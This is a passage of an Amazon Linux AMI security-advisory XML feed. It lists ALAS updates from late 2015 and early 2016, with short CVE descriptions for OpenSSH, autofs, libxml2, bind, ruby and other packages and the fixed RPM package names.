</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5355" title="" id="CVE-2014-5355" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2694" title="" id="CVE-2015-2694" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="krb5-devel" version="1.13.2" release="10.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-devel-1.13.2-10.39.amzn1.x86_64.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.13.2" release="10.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-pkinit-openssl-1.13.2-10.39.amzn1.x86_64.rpm</filename></package><package name="krb5-debuginfo" version="1.13.2" release="10.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-debuginfo-1.13.2-10.39.amzn1.x86_64.rpm</filename></package><package name="krb5-server" version="1.13.2" release="10.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-1.13.2-10.39.amzn1.x86_64.rpm</filename></package><package name="krb5-workstation" version="1.13.2" release="10.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-workstation-1.13.2-10.39.amzn1.x86_64.rpm</filename></package><package name="krb5-libs" version="1.13.2" release="10.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-libs-1.13.2-10.39.amzn1.x86_64.rpm</filename></package><package name="krb5-server-ldap" version="1.13.2" release="10.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-ldap-1.13.2-10.39.amzn1.x86_64.rpm</filename></package><package name="krb5-server" version="1.13.2" release="10.39.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-1.13.2-10.39.amzn1.i686.rpm</filename></package><package name="krb5-libs" version="1.13.2" release="10.39.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-libs-1.13.2-10.39.amzn1.i686.rpm</filename></package><package name="krb5-debuginfo" version="1.13.2" release="10.39.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-debuginfo-1.13.2-10.39.amzn1.i686.rpm</filename></package><package name="krb5-workstation" version="1.13.2" release="10.39.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-workstation-1.13.2-10.39.amzn1.i686.rpm</filename></package><package name="krb5-server-ldap" version="1.13.2" release="10.39.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-ldap-1.13.2-10.39.amzn1.i686.rpm</filename></package><package name="krb5-devel" version="1.13.2" release="10.39.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-devel-1.13.2-10.39.amzn1.i686.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.13.2" release="10.39.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-pkinit-openssl-1.13.2-10.39.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-625</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-625: medium priority package update for openssh</title><issued date="2015-12-14 10:00:00" /><updated date="2015-12-13 14:24:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-6564:
Use-after-free vulnerability in the mm_answer_pam_free_ctx function in monitor.c in sshd in OpenSSH before 7.0 on non-OpenBSD platforms might allow local users to gain privileges by leveraging control of the sshd uid to send an unexpectedly early MONITOR_REQ_PAM_FREE_CTX request.
A use-after-free flaw was found in OpenSSH. An attacker able to fully compromise a non-privileged pre-authentication process using a different flaw could possibly cause sshd to crash or execute arbitrary code with root privileges.
1252852:
CVE-2015-6564 openssh: Use-after-free bug related to PAM support
CVE-2015-6563:
The monitor component in sshd in OpenSSH before 7.0 on non-OpenBSD platforms accepts extraneous username data in MONITOR_REQ_PAM_INIT_CTX requests, which allows local users to conduct impersonation attacks by leveraging any SSH login access in conjunction with control of the sshd uid to send a crafted MONITOR_REQ_PWNAM request, related to monitor.c and monitor_wrap.c.
A flaw was found in the way OpenSSH handled PAM authentication when using privilege separation. An attacker with valid credentials on the system and able to fully compromise a non-privileged pre-authentication process using a different flaw could use this flaw to authenticate as other users.
1252844:
CVE-2015-6563 openssh: Privilege separation weakness related to PAM support
CVE-2015-5600:
It was discovered that the OpenSSH sshd daemon did not check the list of keyboard-interactive authentication methods for duplicates. A remote attacker could use this flaw to bypass the MaxAuthTries limit, making it easier to perform password guessing attacks.
1245969:
CVE-2015-5600 openssh: MaxAuthTries limit bypass via duplicates in KbdInteractiveDevices
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5600" title="" id="CVE-2015-5600" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6563" title="" id="CVE-2015-6563" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6564" title="" id="CVE-2015-6564" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssh" version="6.6.1p1" release="22.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-6.6.1p1-22.58.amzn1.x86_64.rpm</filename></package><package name="openssh-clients" version="6.6.1p1" release="22.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-clients-6.6.1p1-22.58.amzn1.x86_64.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.9.3" release="9.22.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam_ssh_agent_auth-0.9.3-9.22.58.amzn1.x86_64.rpm</filename></package><package name="openssh-server" version="6.6.1p1" release="22.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-server-6.6.1p1-22.58.amzn1.x86_64.rpm</filename></package><package name="openssh-debuginfo" version="6.6.1p1" release="22.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-debuginfo-6.6.1p1-22.58.amzn1.x86_64.rpm</filename></package><package name="openssh-keycat" version="6.6.1p1" release="22.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-keycat-6.6.1p1-22.58.amzn1.x86_64.rpm</filename></package><package name="openssh-ldap" version="6.6.1p1" release="22.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-ldap-6.6.1p1-22.58.amzn1.x86_64.rpm</filename></package><package name="openssh" version="6.6.1p1" release="22.58.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-6.6.1p1-22.58.amzn1.i686.rpm</filename></package><package name="openssh-server" version="6.6.1p1" release="22.58.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-server-6.6.1p1-22.58.amzn1.i686.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.9.3" release="9.22.58.amzn1" epoch="0" arch="i686"><filename>Packages/pam_ssh_agent_auth-0.9.3-9.22.58.amzn1.i686.rpm</filename></package><package name="openssh-keycat" version="6.6.1p1" release="22.58.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-keycat-6.6.1p1-22.58.amzn1.i686.rpm</filename></package><package name="openssh-ldap" version="6.6.1p1" release="22.58.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-ldap-6.6.1p1-22.58.amzn1.i686.rpm</filename></package><package name="openssh-debuginfo" version="6.6.1p1" release="22.58.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-debuginfo-6.6.1p1-22.58.amzn1.i686.rpm</filename></package><package name="openssh-clients" version="6.6.1p1" release="22.58.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-clients-6.6.1p1-22.58.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-626</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-626: medium priority package update for autofs</title><issued date="2015-12-14 10:00:00" /><updated date="2015-12-13 14:25:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-8169:
It was found that program-based automounter maps that used interpreted languages such as Python would use standard environment variables to locate and load modules of those languages. A local attacker could potentially use this flaw to escalate their privileges on the system.
1192565:
CVE-2014-8169 autofs: priv escalation via interpreter load path for program based automount maps
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8169" title="" id="CVE-2014-8169" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="autofs" version="5.0.7" release="54.22.amzn1" epoch="1" arch="x86_64"><filename>Packages/autofs-5.0.7-54.22.amzn1.x86_64.rpm</filename></package><package name="autofs-debuginfo" version="5.0.7" release="54.22.amzn1" epoch="1" arch="x86_64"><filename>Packages/autofs-debuginfo-5.0.7-54.22.amzn1.x86_64.rpm</filename></package><package name="autofs" version="5.0.7" release="54.22.amzn1" epoch="1" arch="i686"><filename>Packages/autofs-5.0.7-54.22.amzn1.i686.rpm</filename></package><package name="autofs-debuginfo" version="5.0.7" release="54.22.amzn1" epoch="1" arch="i686"><filename>Packages/autofs-debuginfo-5.0.7-54.22.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-627</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-627: low priority package update for perl-IPTables-Parse</title><issued date="2015-12-14 10:00:00" /><updated date="2015-12-13 14:25:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-8326:
1267962:
CVE-2015-8326 perl-IPTables-Parse: Use of predictable names for temporary files
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8326" title="" id="CVE-2015-8326" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perl-IPTables-Parse" version="1.5" release="2.3.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-IPTables-Parse-1.5-2.3.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-628</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-628: medium priority package update for libxml2</title><issued date="2015-12-14 10:00:00" /><updated date="2015-12-13 14:28:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-8317:
1281930:
CVE-2015-8317 libxml2: Out-of-bounds heap read when parsing file with unfinished xml declaration
CVE-2015-8242:
1281950:
CVE-2015-8242 libxml2: Buffer overread with HTML parser in push mode in xmlSAX2TextNode
CVE-2015-8241:
1281936:
CVE-2015-8241 libxml2: Buffer overread with XML parser in xmlNextChar
CVE-2015-7942:
The xmlParseConditionalSections function in parser.c in libxml2 does not properly skip intermediary entities when it stops parsing invalid input, which allows context-dependent attackers to cause a denial of service (out-of-bounds read and crash) via crafted XML data, a different vulnerability than CVE-2015-7941.
1276297:
CVE-2015-7942 libxml2: heap-based buffer overflow in xmlParseConditionalSections()
CVE-2015-7941:
libxml2 2.9.2 does not properly stop parsing invalid input, which allows context-dependent attackers to cause a denial of service (out-of-bounds read and libxml2 crash) via crafted XML data to the (1) xmlParseEntityDecl or (2) xmlParseConditionalSections function in parser.c, as demonstrated by non-terminated entities.
1274222:
CVE-2015-7941 libxml2: Out-of-bounds memory access
CVE-2015-7500:
1281943:
CVE-2015-7500 libxml2: Heap buffer overflow in xmlParseMisc
CVE-2015-7499:
1281925:
CVE-2015-7499 libxml2: Heap-based buffer overflow in xmlGROW
CVE-2015-7498:
1281879:
CVE-2015-7498 libxml2: Heap-based buffer overflow in xmlParseXmlDecl
CVE-2015-7497:
1281862:
CVE-2015-7497 libxml2: Heap-based buffer overflow in xmlDictComputeFastQKey
CVE-2015-5312:
1276693:
CVE-2015-5312 libxml2: CPU exhaustion when processing specially crafted XML input
CVE-2015-1819:
A denial of service flaw was found in the way the libxml2 library parsed certain XML files. An attacker could provide a specially crafted XML file that, when parsed by an application using libxml2, could cause that application to use an excessive amount of memory.
1211278:
CVE-2015-1819 libxml2: denial of service processing a crafted XML document
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1819" title="" id="CVE-2015-1819" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5312" title="" id="CVE-2015-5312" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7497" title="" id="CVE-2015-7497" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7498" title="" id="CVE-2015-7498" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7499" title="" id="CVE-2015-7499" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7500" title="" id="CVE-2015-7500" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7941" title="" id="CVE-2015-7941" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7942" title="" id="CVE-2015-7942" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8241" title="" id="CVE-2015-8241" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8242" title="" id="CVE-2015-8242" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8317" title="" id="CVE-2015-8317" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libxml2-static" version="2.9.1" release="6.2.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-static-2.9.1-6.2.50.amzn1.x86_64.rpm</filename></package><package name="libxml2-python27" version="2.9.1" release="6.2.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-python27-2.9.1-6.2.50.amzn1.x86_64.rpm</filename></package><package name="libxml2-debuginfo" version="2.9.1" release="6.2.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-debuginfo-2.9.1-6.2.50.amzn1.x86_64.rpm</filename></package><package name="libxml2" version="2.9.1" release="6.2.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-2.9.1-6.2.50.amzn1.x86_64.rpm</filename></package><package name="libxml2-python26" version="2.9.1" release="6.2.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-python26-2.9.1-6.2.50.amzn1.x86_64.rpm</filename></package><package name="libxml2-devel" version="2.9.1" release="6.2.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-devel-2.9.1-6.2.50.amzn1.x86_64.rpm</filename></package><package name="libxml2" version="2.9.1" release="6.2.50.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-2.9.1-6.2.50.amzn1.i686.rpm</filename></package><package name="libxml2-debuginfo" version="2.9.1" release="6.2.50.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-debuginfo-2.9.1-6.2.50.amzn1.i686.rpm</filename></package><package name="libxml2-python26" version="2.9.1" release="6.2.50.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-python26-2.9.1-6.2.50.amzn1.i686.rpm</filename></package><package name="libxml2-python27" version="2.9.1" release="6.2.50.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-python27-2.9.1-6.2.50.amzn1.i686.rpm</filename></package><package name="libxml2-devel" version="2.9.1" release="6.2.50.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-devel-2.9.1-6.2.50.amzn1.i686.rpm</filename></package><package name="libxml2-static" version="2.9.1" release="6.2.50.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-static-2.9.1-6.2.50.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-629</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-629: medium priority package update for perl-HTML-Scrubber</title><issued date="2015-12-14 10:00:00" /><updated date="2015-12-13 14:25:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-5667:
Cross-site scripting (XSS) vulnerability in the HTML-Scrubber module before 0.15 for Perl, when the comment feature is enabled, allows remote attackers to inject arbitrary web script or HTML via a crafted comment.
1276646:
CVE-2015-5667 perl-HTML-Scrubber: XSS vulnerability when function "comment" is enabled
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5667" title="" id="CVE-2015-5667" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perl-HTML-Scrubber" version="0.15" release="1.5.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-HTML-Scrubber-0.15-1.5.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-630</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-630: important priority package update for python-pygments</title><issued date="2015-12-14 15:14:00" /><updated date="2015-12-14 15:14:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-8557:
CVE-2015-8557
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8557" title="" id="CVE-2015-8557" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python26-pygments" version="1.4" release="4.12.amzn1" epoch="0" arch="noarch"><filename>Packages/python26-pygments-1.4-4.12.amzn1.noarch.rpm</filename></package><package name="python27-pygments" version="1.4" release="4.12.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-pygments-1.4-4.12.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-631</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-631: critical priority package update for bind</title><issued date="2015-12-15 13:00:00" /><updated date="2015-12-16 20:25:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-8000:
Embargoed
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8000" title="" id="CVE-2015-8000" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:2655.html" title="" id="RHSA-2015:2655" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-utils" version="9.8.2" release="0.37.rc1.42.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.37.rc1.42.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.37.rc1.42.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.37.rc1.42.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.37.rc1.42.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.37.rc1.42.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.37.rc1.42.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.37.rc1.42.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.37.rc1.42.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.37.rc1.42.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.37.rc1.42.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.37.rc1.42.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.37.rc1.42.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.37.rc1.42.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.37.rc1.42.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.37.rc1.42.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.37.rc1.42.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.37.rc1.42.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.37.rc1.42.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.37.rc1.42.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.37.rc1.42.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.37.rc1.42.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.37.rc1.42.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.37.rc1.42.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.37.rc1.42.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.37.rc1.42.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.37.rc1.42.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.37.rc1.42.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-632</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-632: low priority package update for ruby19 ruby20 ruby21 ruby22</title><issued date="2016-01-18 11:00:00" /><updated date="2016-01-18 11:00:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-7551:
1248935:
CVE-2009-5147 CVE-2015-7551 ruby: DL::dlopen could open a library with tainted library name
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7551" title="" id="CVE-2015-7551" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ruby22-devel" version="2.2.4" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby22-devel-2.2.4-1.8.amzn1.x86_64.rpm</filename></package><package name="ruby22-irb" version="2.2.4" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby22-irb-2.2.4-1.8.amzn1.noarch.rpm</filename></package><package name="ruby22-libs" version="2.2.4" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby22-libs-2.2.4-1.8.amzn1.x86_64.rpm</filename></package><package name="rubygem22-io-console" version="0.4.3" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem22-io-console-0.4.3-1.8.amzn1.x86_64.rpm</filename></package><package name="ruby22-debuginfo" version="2.2.4" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby22-debuginfo-2.2.4-1.8.amzn1.x86_64.rpm</filename></package><package name="rubygems22-devel" version="2.4.5.1" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems22-devel-2.4.5.1-1.8.amzn1.noarch.rpm</filename></package><package name="rubygem22-psych" version="2.0.8" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem22-psych-2.0.8-1.8.amzn1.x86_64.rpm</filename></package><package name="ruby22-doc" version="2.2.4" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby22-doc-2.2.4-1.8.amzn1.noarch.rpm</filename></package><package name="rubygems22" version="2.4.5.1" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems22-2.4.5.1-1.8.amzn1.noarch.rpm</filename></package><package name="rubygem22-bigdecimal" version="1.2.6" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem22-bigdecimal-1.2.6-1.8.amzn1.x86_64.rpm</filename></package><package name="ruby22" version="2.2.4" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby22-2.2.4-1.8.amzn1.x86_64.rpm</filename></package><package name="rubygem22-psych" version="2.0.8" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem22-psych-2.0.8-1.8.amzn1.i686.rpm</filename></package><package name="ruby22-debuginfo" version="2.2.4" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/ruby22-debuginfo-2.2.4-1.8.amzn1.i686.rpm</filename></package><package name="ruby22" version="2.2.4" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/ruby22-2.2.4-1.8.amzn1.i686.rpm</filename></package><package name="rubygem22-io-console" version="0.4.3" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem22-io-console-0.4.3-1.8.amzn1.i686.rpm</filename></package><package name="ruby22-devel" version="2.2.4" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/ruby22-devel-2.2.4-1.8.amzn1.i686.rpm</filename></package><package name="ruby22-libs" version="2.2.4" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/ruby22-libs-2.2.4-1.8.amzn1.i686.rpm</filename></package><package name="rubygem22-bigdecimal" version="1.2.6" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem22-bigdecimal-1.2.6-1.8.amzn1.i686.rpm</filename></package><package name="rubygem21-bigdecimal" version="1.2.4" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-bigdecimal-1.2.4-1.19.amzn1.x86_64.rpm</filename></package><package name="ruby21-doc" version="2.1.8" release="1.19.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby21-doc-2.1.8-1.19.amzn1.noarch.rpm</filename></package><package name="ruby21-irb" version="2.1.8" release="1.19.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby21-irb-2.1.8-1.19.amzn1.noarch.rpm</filename></package><package name="rubygems21-devel" version="2.2.5" release="1.19.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems21-devel-2.2.5-1.19.amzn1.noarch.rpm</filename></package><package name="ruby21" version="2.1.8" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-2.1.8-1.19.amzn1.x86_64.rpm</filename></package><package name="rubygems21" version="2.2.5" release="1.19.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems21-2.2.5-1.19.amzn1.noarch.rpm</filename></package><package name="rubygem21-psych" version="2.0.5" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-psych-2.0.5-1.19.amzn1.x86_64.rpm</filename></package><package name="ruby21-debuginfo" version="2.1.8" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-debuginfo-2.1.8-1.19.amzn1.x86_64.rpm</filename></package><package name="ruby21-devel" version="2.1.8" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-devel-2.1.8-1.19.amzn1.x86_64.rpm</filename></package><package name="ruby21-libs" version="2.1.8" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-libs-2.1.8-1.19.amzn1.x86_64.rpm</filename></package><package name="rubygem21-io-console" version="0.4.3" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-io-console-0.4.3-1.19.amzn1.x86_64.rpm</filename></package><package name="ruby21-libs" version="2.1.8" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-libs-2.1.8-1.19.amzn1.i686.rpm</filename></package><package name="rubygem21-io-console" version="0.4.3" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-io-console-0.4.3-1.19.amzn1.i686.rpm</filename></package><package name="ruby21-devel" version="2.1.8" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-devel-2.1.8-1.19.amzn1.i686.rpm</filename></package><package name="ruby21-debuginfo" version="2.1.8" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-debuginfo-2.1.8-1.19.amzn1.i686.rpm</filename></package><package name="rubygem21-psych" version="2.0.5" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-psych-2.0.5-1.19.amzn1.i686.rpm</filename></package><package name="rubygem21-bigdecimal" version="1.2.4" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-bigdecimal-1.2.4-1.19.amzn1.i686.rpm</filename></package><package name="ruby21" version="2.1.8" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-2.1.8-1.19.amzn1.i686.rpm</filename></package><package name="rubygems19" version="1.8.23.2" release="32.70.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems19-1.8.23.2-32.70.amzn1.noarch.rpm</filename></package><package name="ruby19-devel" version="1.9.3.551" release="32.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-devel-1.9.3.551-32.70.amzn1.x86_64.rpm</filename></package><package name="rubygems19-devel" version="1.8.23.2" release="32.70.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems19-devel-1.8.23.2-32.70.amzn1.noarch.rpm</filename></package><package name="rubygem19-rake" version="0.9.2.2" release="32.70.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem19-rake-0.9.2.2-32.70.amzn1.noarch.rpm</filename></package><package name="ruby19-irb" version="1.9.3.551" release="32.70.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby19-irb-1.9.3.551-32.70.amzn1.noarch.rpm</filename></package><package name="rubygem19-bigdecimal" version="1.1.0" release="32.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem19-bigdecimal-1.1.0-32.70.amzn1.x86_64.rpm</filename></package><package name="ruby19-libs" version="1.9.3.551" release="32.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-libs-1.9.3.551-32.70.amzn1.x86_64.rpm</filename></package><package name="rubygem19-io-console" version="0.3" release="32.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem19-io-console-0.3-32.70.amzn1.x86_64.rpm</filename></package><package name="ruby19-doc" version="1.9.3.551" release="32.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-doc-1.9.3.551-32.70.amzn1.x86_64.rpm</filename></package><package 